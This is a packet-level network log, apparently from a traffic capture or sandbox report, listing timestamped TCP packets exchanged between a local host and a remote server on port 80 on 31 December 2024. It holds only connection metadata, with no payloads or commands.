                                                        Dec 31, 2024 09:28:25.518647909 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.518728018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518739939 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518752098 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518794060 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.518877029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518887997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518903971 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518914938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518923998 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.518934011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518945932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518954039 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.518981934 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.519155025 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519207954 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.519226074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519238949 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519249916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519268036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519275904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.519289017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519309998 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.519479036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519490004 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519501925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519526005 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.519551992 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.519618988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519634962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519676924 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.519748926 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519758940 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519769907 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519781113 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519793987 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.519804955 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519817114 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519825935 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.519834995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.519862890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.520034075 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.520045996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.520056963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.520067930 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.520082951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.520088911 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.520108938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.520117044 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.520124912 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.520134926 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.520147085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.520169020 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.520350933 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.520400047 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.525314093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525405884 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525418043 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525434017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525445938 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.525469065 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.525522947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525538921 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525551081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525585890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.525620937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525631905 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525643110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525660992 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.525684118 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.525743961 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525754929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525767088 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525836945 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.525862932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525873899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525885105 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525893927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525903940 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.525918961 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.525983095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.525995016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526005983 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526015997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526024103 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526040077 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526093960 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526124001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526132107 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526141882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526180029 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526207924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526216984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526227951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526237965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526262999 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526282072 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526351929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526362896 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526380062 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526391029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526416063 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526433945 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526495934 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526505947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526516914 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526527882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526536942 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526546001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526557922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526566029 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526597023 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526690006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526701927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526714087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526741982 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526813030 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526823044 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526843071 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526853085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526864052 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526887894 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526936054 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526947021 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526957989 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.526978970 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.526988029 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.527790070 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.609657049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.609684944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.609697104 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.609760046 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.609780073 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.609791994 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.609821081 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.609926939 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.609939098 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.609976053 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610002041 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610013008 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610023975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610034943 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610043049 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610066891 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610176086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610188007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610198975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610209942 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610215902 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610236883 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610362053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610371113 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610382080 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610408068 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610430002 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610456944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610467911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610477924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610491037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610503912 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610527039 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610611916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610621929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610681057 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610796928 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610847950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610857964 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.610889912 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.610991955 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.611002922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.611022949 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.611031055 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.611040115 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.611052036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.611058950 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.611099005 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.625237942 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625261068 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625272036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625336885 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.625354052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625365973 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625391006 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.625443935 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625461102 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625485897 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.625555038 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625566006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625596046 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.625675917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625685930 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625696898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625708103 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.625729084 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.625860929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625871897 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625884056 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625894070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625905037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625916004 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.625922918 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.625953913 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.626178980 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626189947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626202106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626211882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626224041 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626235962 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.626267910 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.626343012 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626355886 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626384974 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.626549006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626559973 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626576900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626588106 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.626596928 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626610041 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.626616001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626626015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626637936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626651049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626657963 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.626666069 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.626674891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.626714945 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.627243996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628424883 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628437042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628469944 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.628510952 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628526926 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628560066 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.628580093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628623009 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.628648043 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628660917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628703117 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.628779888 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628791094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628802061 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628813982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628834963 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.628845930 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.628978014 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628988981 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.628998995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.629024982 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.629420996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.629473925 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.629482985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.629496098 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.629533052 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.629715919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.629725933 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.629762888 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.629776001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.629792929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.629832029 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.629945040 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630120039 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630131006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630156040 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.630287886 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630302906 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630315065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630325079 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.630331993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630345106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630352020 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.630361080 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630378008 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.630383968 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630422115 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.630662918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630676031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630686998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630697966 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630717993 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.630736113 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.630872011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630923033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630935907 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.630970001 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.631037951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631050110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631062031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631088018 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.631107092 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.631175995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631186962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631197929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631211042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631238937 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.631257057 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.631642103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631655931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631668091 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631679058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.631691933 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.631714106 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.633604050 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.697223902 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697247028 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697257996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697397947 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.697422028 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697432995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697443962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697455883 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697477102 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.697575092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697586060 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697592020 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697597980 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697660923 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.697768927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697779894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697793007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.697808981 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.697833061 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.698282003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698298931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698333025 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.698348045 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698409081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698421001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698448896 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.698487043 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698528051 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.698559999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698571920 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698582888 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698610067 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.698693037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698704004 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698715925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698735952 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.698743105 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698750973 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.698761940 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.698796988 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.698939085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.712831020 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.712843895 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.712884903 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.712891102 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.712904930 CET804970887.120.113.91192.168.2.8
